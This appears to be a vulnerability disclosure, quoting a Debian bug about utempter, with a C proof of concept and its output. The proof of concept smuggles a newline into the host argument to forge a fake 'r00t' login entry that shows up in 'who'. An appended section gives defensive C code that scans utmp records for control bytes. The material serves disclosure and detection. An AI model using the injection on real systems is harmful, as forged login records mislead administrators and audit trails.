Quoting from
http://bugs.debian.org/689562
Utempter does not (cannot?) verify the setting of host, so it can easily
be faked. This may affect any software that depends on utmp correctness.
Demo of the issue:
psz@bari:~$ cat silly.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>   /* system() */

int main()
{
    int i;

    /* Obtain a pty master; utempter identifies the terminal from fd 0. */
    i = open("/dev/ptmx", O_RDWR);
    printf("open ptmx returned %d\n", i);
    dup2(i, 0);
    /* dup2(i, 1); */

    /* The host argument is not validated: an embedded newline ends the
     * real entry's host and starts a second, fully attacker-chosen line. */
    printf("doing utempter add\n");
    system("/usr/lib/utempter/utempter add 'xyz)\nr00t pts/0 Jan 1 01:02 (xyz.com'");
    printf("checking who\n");
    system("who | grep xyz");

    printf("doing utempter del\n");
    system("/usr/lib/utempter/utempter del");
    printf("checking who\n");
    system("who | grep xyz");
    printf("DONE\n");
    return 0;
}
psz@bari:~$ cc silly.c; a.out
open ptmx returned 3
doing utempter add
checking who
psz pts/29 Oct 4 11:48 (xyz)
r00t pts/0 Jan 1 01:02 (xyz.com)
doing utempter del
checking who
DONE
psz@bari:~$
Please see also:
http://bugs.debian.org/329156
http://bugs.debian.org/330907
Cheers, Paul
Paul Szabo [email protected] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
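The detection side of the issue, added here as an example that is not part of Paul's report or of utempter itself: it walks the utmpx database with getutxent() and flags login records whose fixed-size text fields contain control characters, which is exactly what the forged host string in the demo relies on to print as a second `who` line. The function names are my own, and the sample record is constructed from the demo's host string.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <utmpx.h>

/* utmp string fields are fixed-size and need not be NUL-terminated. Return 1
 * if one holds a non-printable byte: the '\n' in the forged ut_host is what
 * makes "who" print a second line. (C locale isprint() also rejects non-ASCII.) */
int field_has_control_bytes(const char *field, size_t size)
{
    for (size_t i = 0; i < size && field[i] != '\0'; i++)
        if (!isprint((unsigned char)field[i]))
            return 1;
    return 0;
}

/* Returns 1 if any text field of the login record looks forged. */
int record_is_suspicious(const struct utmpx *ut)
{
    return field_has_control_bytes(ut->ut_user, sizeof ut->ut_user)
        || field_has_control_bytes(ut->ut_line, sizeof ut->ut_line)
        || field_has_control_bytes(ut->ut_host, sizeof ut->ut_host);
}

/* Audit pass over the live utmp database: report each bad login record. */
int scan_live_utmp(void)
{
    int bad = 0;
    struct utmpx *ut;
    setutxent();
    while ((ut = getutxent()) != NULL)
        if (ut->ut_type == USER_PROCESS && record_is_suspicious(ut)) {
            bad++;
            fprintf(stderr, "suspicious utmp entry on %.*s\n",
                    (int)sizeof ut->ut_line, ut->ut_line);
        }
    endutxent();
    return bad;
}

/* Constructed sample record carrying the host string used in the demo. */
int demo_forged_record(void)
{
    struct utmpx ut;
    memset(&ut, 0, sizeof ut);
    ut.ut_type = USER_PROCESS;
    strncpy(ut.ut_user, "psz", sizeof ut.ut_user);
    strncpy(ut.ut_host, "xyz)\nr00t pts/0 Jan 1 01:02 (xyz.com", sizeof ut.ut_host);
    return record_is_suspicious(&ut);
}
```

Run scan_live_utmp() from a periodic job with read access to /var/run/utmp; a non-zero return means a record that no legitimate login path would have written.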